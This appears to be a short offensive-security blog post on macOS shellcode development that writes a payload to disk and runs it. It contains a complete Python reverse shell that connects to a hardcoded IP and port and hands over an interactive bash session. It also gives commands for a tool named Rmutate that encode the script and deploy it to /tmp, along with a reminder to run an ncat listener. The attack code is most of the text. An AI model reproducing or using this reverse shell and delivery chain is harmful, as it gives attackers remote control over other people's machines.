OSX Write to HDD and Execute Shellcode

In most cases this method of shellcode dev should not be used because the “Write to Mem” is superior over the “Write to HDD”

Let’s take the following reverse shell written in python which every OSX box and almost every Linux box has.

#!/usr/bin/env python

# GNUv3 (Scourge) 
# Python Reverse Shell with PWD feedback
# Based off of the pentestermonkey version

import socket,pty,os; 
# import pty, not subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(("10.1.1.25",5555)) 

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2) 

x=pty.spawn("/bin/bash") 
# pty in place of subprocess

Next we will remove un-needed newlines and spaces.
For help with formatting file-to-base64 use

Rmutate -h -f6

above you could either add the “-x ”
or you could direct to a file like

Rmutate r > shell.py

Sense Rmutate always updates your clipboard.

Rmutate -fx ./shell.py -osx "/usr/bin/env  python  /tmp/r.py" -df ./test rev -ex

Remember to have a listener on the other line.
ncat

radicalware

Maa$: We Build It, You Wield It!!

OSX Write to HDD and Execute Shellcode